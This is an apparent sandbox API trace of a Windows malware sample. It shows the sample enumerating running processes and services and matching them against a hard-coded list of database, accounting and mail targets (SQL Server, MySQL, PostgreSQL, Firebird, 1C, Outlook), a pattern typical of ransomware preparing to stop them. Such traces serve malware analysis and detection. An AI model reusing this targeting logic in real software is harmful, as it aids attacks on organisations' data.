	[0146.109] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.109] lstrlenW (lpString="svchost.exe") returned 11
	[0146.109] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.109] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0146.110] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.110] lstrlenW (lpString="svchost.exe") returned 11
	[0146.110] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0146.110] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.110] lstrlenW (lpString="svchost.exe") returned 11
	[0146.110] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0146.110] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0146.111] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0146.111] lstrlenW (lpString="audiodg.exe") returned 11
	[0146.111] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.111] lstrlenW (lpString="svchost.exe") returned 11
	[0146.111] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.111] lstrlenW (lpString="svchost.exe") returned 11
	[0146.112] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0146.112] lstrlenW (lpString="spoolsv.exe") returned 11
	[0146.112] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0146.112] lstrlenW (lpString="svchost.exe") returned 11
	[0146.112] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0146.112] lstrlenW (lpString="taskhost.exe") returned 12
	[0146.112] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0146.113] lstrlenW (lpString="userinit.exe") returned 12
	[0146.113] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0146.113] lstrlenW (lpString="dwm.exe") returned 7
	[0146.113] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0146.113] lstrlenW (lpString="explorer.exe") returned 12
	[0146.113] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0146.114] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0146.114] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0146.114] lstrlenW (lpString="reader_sl.exe") returned 13
	[0146.114] Process32NextW (in: hSnapshot=0x1b8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0146.114] CloseHandle (hObject=0x1b8) returned 1
	[0146.114] Sleep (dwMilliseconds=0x1f4) 
	[0146.708] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617110
	[0146.919] EnumServicesStatusExW (in: hSCManager=0xb617110, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0146.920] GetLastError () returned 0xea
	[0146.920] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0146.920] EnumServicesStatusExW (in: hSCManager=0xb617110, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0146.920] CloseServiceHandle (hSCObject=0xb617110) returned 1
	[0146.920] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0146.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0146.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0146.920] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0146.920] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0146.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0146.920] lstrlenW (lpString="AudioSrv") returned 8
	[0146.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0146.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0146.920] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0146.920] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0146.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0146.920] lstrlenW (lpString="BFE") returned 3
	[0146.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0146.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0146.921] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0146.921] lstrlenW (lpString="CryptSvc") returned 8
	[0146.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0146.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0146.921] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0146.921] lstrlenW (lpString="CscService") returned 10
	[0146.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0146.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0146.921] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0146.921] lstrlenW (lpString="DcomLaunch") returned 10
	[0146.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0146.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0146.921] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0146.921] lstrlenW (lpString="Dhcp") returned 4
	[0146.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0146.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0146.921] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0146.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0146.921] lstrlenW (lpString="Dnscache") returned 8
	[0146.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0146.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0146.922] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0146.922] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0146.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0146.922] lstrlenW (lpString="DPS") returned 3
	[0146.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0146.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0146.922] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0146.922] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0146.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0146.922] lstrlenW (lpString="eventlog") returned 8
	[0146.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0146.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0146.922] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0146.922] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0146.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0146.922] lstrlenW (lpString="EventSystem") returned 11
	[0146.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0146.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0146.922] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0146.922] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0146.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0146.922] lstrlenW (lpString="gpsvc") returned 5
	[0146.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0146.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0146.922] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0146.922] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0146.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0146.922] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0146.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0146.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0146.923] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0146.923] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0146.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0146.923] lstrlenW (lpString="lmhosts") returned 7
	[0146.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0146.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0146.923] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0146.923] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0146.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0146.923] lstrlenW (lpString="MMCSS") returned 5
	[0146.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0146.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0146.923] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0146.923] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0146.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0146.923] lstrlenW (lpString="MpsSvc") returned 6
	[0146.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0146.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0146.923] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0146.923] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0146.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0146.923] lstrlenW (lpString="NlaSvc") returned 6
	[0146.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0146.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0146.923] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0146.923] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0146.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0146.923] lstrlenW (lpString="nsi") returned 3
	[0146.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0146.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0146.924] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0146.924] lstrlenW (lpString="PcaSvc") returned 6
	[0146.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0146.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0146.924] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0146.924] lstrlenW (lpString="PlugPlay") returned 8
	[0146.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0146.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0146.924] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0146.924] lstrlenW (lpString="Power") returned 5
	[0146.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0146.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0146.924] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0146.924] lstrlenW (lpString="ProfSvc") returned 7
	[0146.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0146.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0146.924] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0146.924] lstrlenW (lpString="RpcEptMapper") returned 12
	[0146.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0146.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0146.924] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0146.925] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0146.925] lstrlenW (lpString="RpcSs") returned 5
	[0146.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0146.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0146.925] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0146.925] lstrlenW (lpString="SamSs") returned 5
	[0146.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0146.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0146.925] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0146.925] lstrlenW (lpString="Schedule") returned 8
	[0146.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0146.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0146.925] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0146.925] lstrlenW (lpString="SENS") returned 4
	[0146.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0146.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0146.925] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0146.925] lstrlenW (lpString="ShellHWDetection") returned 16
	[0146.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0146.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0146.925] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0146.925] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0146.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0146.926] lstrlenW (lpString="Spooler") returned 7
	[0146.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0146.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0146.926] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0146.926] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0146.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0146.926] lstrlenW (lpString="Themes") returned 6
	[0146.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0146.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0146.926] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0146.926] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0146.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0146.926] lstrlenW (lpString="UxSms") returned 5
	[0146.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0146.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0146.926] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0146.926] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0146.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0146.926] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0146.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x384
	[0146.928] Process32FirstW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0146.929] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0146.929] lstrlenW (lpString="System") returned 6
	[0146.929] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0146.929] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0146.929] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0146.929] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0146.929] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0146.929] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0146.929] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0146.929] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0146.929] lstrlenW (lpString="smss.exe") returned 8
	[0146.929] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0146.929] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0146.930] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0146.930] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0146.930] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0146.930] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0146.930] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0146.930] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0146.930] lstrlenW (lpString="csrss.exe") returned 9
	[0146.930] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0146.930] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0146.930] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0146.930] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0146.930] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0146.930] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0146.930] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
